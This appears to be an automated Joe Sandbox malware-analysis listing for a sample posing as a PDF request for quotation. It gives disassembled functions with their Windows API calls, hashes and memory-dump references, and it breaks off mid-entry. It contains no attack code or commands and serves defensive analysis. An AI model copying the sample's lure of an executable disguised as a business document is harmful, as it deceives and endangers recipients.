                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 2931989736-0
                                                                                                                • Opcode ID: bb511b4f54a816fc3ff861dd2743c02e8831f44998b4a1b4b449211f40efe912
                                                                                                                • Instruction ID: 5d99e2113cbbc9a2f76dde8a7f0f66042921ab34e58a108c61e184b98977f4ba
                                                                                                                • Opcode Fuzzy Hash: bb511b4f54a816fc3ff861dd2743c02e8831f44998b4a1b4b449211f40efe912
                                                                                                                • Instruction Fuzzy Hash: F4019671A41A15BE921856209E42EBB736CAB223A4B044C21FD16BF781F761ED1082A4
                                                                                                                Function 00A5990E Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 00A598CC
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00A598D6
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00A598E9
                                                                                                                • GetStockObject.GDI32(00000005), ref: 00A598F1
                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00A59952
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$LongModeObjectStockTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860813098-0
                                                                                                                • Opcode ID: 639a7a8deda9aa29674435b8652cd1ab57f90e04f37b1e9abccf4bcf932b285d
                                                                                                                • Instruction ID: ebb2dc9288dd273e406426534da5c39ae81959174493232cc7e672def7b8d627
                                                                                                                • Opcode Fuzzy Hash: 639a7a8deda9aa29674435b8652cd1ab57f90e04f37b1e9abccf4bcf932b285d
                                                                                                                • Instruction Fuzzy Hash: D6112732146110DBCB128F55EC55FEB3B64FB12366B44015AF9828F1B2C7355845CB50
                                                                                                                Function 00AA000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?,?,00AA035E), ref: 00AA002B
                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?), ref: 00AA0046
                                                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?), ref: 00AA0054
                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?), ref: 00AA0064
                                                                                                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?), ref: 00AA0070
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 3897988419-0
                                                                                                                • Opcode ID: ac335cab232654c2354e573e31857ff3169458ea73c2f6d9505d1b8a376b809f
                                                                                                                • Instruction ID: aed6096e687073113afcdc97f28ce8426a3719e04598a4334e9787eabae5c9f5
                                                                                                                • Opcode Fuzzy Hash: ac335cab232654c2354e573e31857ff3169458ea73c2f6d9505d1b8a376b809f
                                                                                                                • Instruction Fuzzy Hash: C1018B72601605BFDB108FA8DC04FAEBBAEEB487A2F144125F906D7250E771DD41DBA0
                                                                                                                Function 00AAE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00AAE997
                                                                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 00AAE9A5
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00AAE9AD
                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00AAE9B7
                                                                                                                • Sleep.KERNEL32 ref: 00AAE9F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                • String ID:
                                                                                                                • API String ID: 2833360925-0
                                                                                                                • Opcode ID: b050572d700a782d90f22483eec251538406e1d5fdfc250fdd70b6e4e4bac652
                                                                                                                • Instruction ID: e3acfef2155e89759d51dbad81b722c77baa28f51961d91ba180e79d17c8f20d
                                                                                                                • Opcode Fuzzy Hash: b050572d700a782d90f22483eec251538406e1d5fdfc250fdd70b6e4e4bac652
                                                                                                                • Instruction Fuzzy Hash: 8F010531C0262ADBCF00EBE5DD59AEEFB78BB0A711F400656E502B3281CB309556CBA1
                                                                                                                Function 00AA10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AA1114
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA1120
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA112F
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA1136
                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AA114D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 842720411-0
                                                                                                                • Opcode ID: bd4539d9bd67bb8c1e1d9464435a52207184cefcbff49df1426c1ef2095e13a2
                                                                                                                • Instruction ID: 003e10cddca6c7c66c38678a8e0b30547be1309113bfe44626b12bfe11995ce1
                                                                                                                • Opcode Fuzzy Hash: bd4539d9bd67bb8c1e1d9464435a52207184cefcbff49df1426c1ef2095e13a2
                                                                                                                • Instruction Fuzzy Hash: C0016D75101216BFDB118FA4DC49A6A3B6EEF86374B500419FA42C7390DB31DC01DA60
                                                                                                                Function 00AA0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AA0FCA
                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AA0FD6
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AA0FE5
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AA0FEC
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AA1002
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: 0d35ae9dd41c57998fd07293bacce3b984d4b2a0ba9b62b05b25f23cd6338633
                                                                                                                • Instruction ID: f40b6f4f06b9a81fc4b28b643a5919792ef87af21fc69f3279a8f16fcb510b5b
                                                                                                                • Opcode Fuzzy Hash: 0d35ae9dd41c57998fd07293bacce3b984d4b2a0ba9b62b05b25f23cd6338633
                                                                                                                • Instruction Fuzzy Hash: B7F04935241312FBDB218FA49C49F563BADEF8A762F514426FA46C7291CA70DC41CA60
                                                                                                                Function 00AA1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AA102A
                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AA1036
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AA1045
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AA104C
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AA1062
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: 9f81027c577b5a541103f55fb7a84a37c3d62577b868874d68febd02da769ba7
                                                                                                                • Instruction ID: ada488fc59469e5c5741c0e1e492e7751092627031b283b3fa8858368552e694
                                                                                                                • Opcode Fuzzy Hash: 9f81027c577b5a541103f55fb7a84a37c3d62577b868874d68febd02da769ba7
                                                                                                                • Instruction Fuzzy Hash: 9EF06D35241312FBDB219FE4EC49F567BADEF8A761F910426FA56C7290CB70D841CA60
                                                                                                                Function 00AB030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00AB017D,?,00AB32FC,?,00000001,00A82592,?), ref: 00AB0324
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00AB017D,?,00AB32FC,?,00000001,00A82592,?), ref: 00AB0331
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00AB017D,?,00AB32FC,?,00000001,00A82592,?), ref: 00AB033E
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00AB017D,?,00AB32FC,?,00000001,00A82592,?), ref: 00AB034B
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00AB017D,?,00AB32FC,?,00000001,00A82592,?), ref: 00AB0358
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00AB017D,?,00AB32FC,?,00000001,00A82592,?), ref: 00AB0365
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: 27f50ddffdb03e7cdd4164d094f351cef26f997071d54862b1702e7c8bcdcd33
                                                                                                                • Instruction ID: 6789d01b7f330957a446d5d179db319398253570f57e8bb4e9a697bd21af5d13
                                                                                                                • Opcode Fuzzy Hash: 27f50ddffdb03e7cdd4164d094f351cef26f997071d54862b1702e7c8bcdcd33
                                                                                                                • Instruction Fuzzy Hash: 8401E272800B058FC7309F66D880843F7F9BF503153048A3FD19252932C370A944CF80
                                                                                                                Function 00A7D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00A7D752
                                                                                                                  • Part of subcall function 00A729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000), ref: 00A729DE
                                                                                                                  • Part of subcall function 00A729C8: GetLastError.KERNEL32(00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000,00000000), ref: 00A729F0
                                                                                                                • _free.LIBCMT ref: 00A7D764
                                                                                                                • _free.LIBCMT ref: 00A7D776
                                                                                                                • _free.LIBCMT ref: 00A7D788
                                                                                                                • _free.LIBCMT ref: 00A7D79A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 79de9e748d299e02e673740068c2e93183b7fa040595ba3ef6434bbabf6fa4e5
                                                                                                                • Instruction ID: 48c9ce069347f3a37cbcddfdcf4b917810ec33f68e916e8e4e9d68a7ddba4a9e
                                                                                                                • Opcode Fuzzy Hash: 79de9e748d299e02e673740068c2e93183b7fa040595ba3ef6434bbabf6fa4e5
                                                                                                                • Instruction Fuzzy Hash: 8DF0EC32544204ABC625EB68FEC5D16BBEDBF94710B98C905F14DE7542CB20FC808664
                                                                                                                Function 00AA5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00AA5C58
                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00AA5C6F
                                                                                                                • MessageBeep.USER32(00000000), ref: 00AA5C87
                                                                                                                • KillTimer.USER32(?,0000040A), ref: 00AA5CA3
                                                                                                                • EndDialog.USER32(?,00000001), ref: 00AA5CBD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3741023627-0
                                                                                                                • Opcode ID: 3c424b08c7a00f7a6429ed2ed649a0552a421814974bc08748e92aef1dd2493f
                                                                                                                • Instruction ID: 7bfbb5008504af89c66167125f5da54aeb0453e351cf7f308ebccb0e61c56595
                                                                                                                • Opcode Fuzzy Hash: 3c424b08c7a00f7a6429ed2ed649a0552a421814974bc08748e92aef1dd2493f
                                                                                                                • Instruction Fuzzy Hash: 4A01FE305007049BEB215F60DD4EFA677B8FF01715F40125AB543620E0D7F0D945CB54
                                                                                                                Function 00A722A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00A722BE
                                                                                                                  • Part of subcall function 00A729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000), ref: 00A729DE
                                                                                                                  • Part of subcall function 00A729C8: GetLastError.KERNEL32(00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000,00000000), ref: 00A729F0
                                                                                                                • _free.LIBCMT ref: 00A722D0
                                                                                                                • _free.LIBCMT ref: 00A722E3
                                                                                                                • _free.LIBCMT ref: 00A722F4
                                                                                                                • _free.LIBCMT ref: 00A72305
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: fc55b0d49974b199e853297f099097ea682e815415dc0b042c63332c488b4cc8
                                                                                                                • Instruction ID: 446e0d0294caf7fdcec31f21bd5443da20717392ba398a682a1ae885b19b6dff
                                                                                                                • Opcode Fuzzy Hash: fc55b0d49974b199e853297f099097ea682e815415dc0b042c63332c488b4cc8
                                                                                                                • Instruction Fuzzy Hash: 43F054724112108BC712BF68BD029987F64F768750B85CA16F519D32B1CF7504D29FE4
                                                                                                                Function 00A595C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EndPath.GDI32(?), ref: 00A595D4
                                                                                                                • StrokeAndFillPath.GDI32(?,?,00A971F7,00000000,?,?,?), ref: 00A595F0
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00A59603
                                                                                                                • DeleteObject.GDI32 ref: 00A59616
                                                                                                                • StrokePath.GDI32(?), ref: 00A59631
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2625713937-0
                                                                                                                • Opcode ID: c27cc41240c486288002b8205f37f28448fbf4888ed627ac4c97d684169ec36a
                                                                                                                • Instruction ID: e546862a30522057eccea03be5d46116c30eebd67930841f1e75601e7c926eb6
                                                                                                                • Opcode Fuzzy Hash: c27cc41240c486288002b8205f37f28448fbf4888ed627ac4c97d684169ec36a
                                                                                                                • Instruction Fuzzy Hash: B4F03130006205DBDB129F59ED1C7A53B61B700372F84C215F9265A0F0DB30855BDF20
                                                                                                                Function 00A70F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __freea$_free
                                                                                                                • String ID: a/p$am/pm
                                                                                                                • API String ID: 3432400110-3206640213
                                                                                                                • Opcode ID: 9e001f8c4f8533da0f632507478791a926fcb918e48ab3d292667939e5e7aeed
                                                                                                                • Instruction ID: 4d6ecfcb41ca16dd2d07165a8085570f3fc37c6eaf76398c70cd55038393398e
                                                                                                                • Opcode Fuzzy Hash: 9e001f8c4f8533da0f632507478791a926fcb918e48ab3d292667939e5e7aeed
                                                                                                                • Instruction Fuzzy Hash: BAD1E031900206DADB689F6CCC95BFAB7F4EF05700F28C269E909AF651D3359D81CBA1
                                                                                                                Function 00AC7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A60242: EnterCriticalSection.KERNEL32(00B1070C,00B11884,?,?,00A5198B,00B12518,?,?,?,00A412F9,00000000), ref: 00A6024D
                                                                                                                  • Part of subcall function 00A60242: LeaveCriticalSection.KERNEL32(00B1070C,?,00A5198B,00B12518,?,?,?,00A412F9,00000000), ref: 00A6028A
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00A600A3: __onexit.LIBCMT ref: 00A600A9
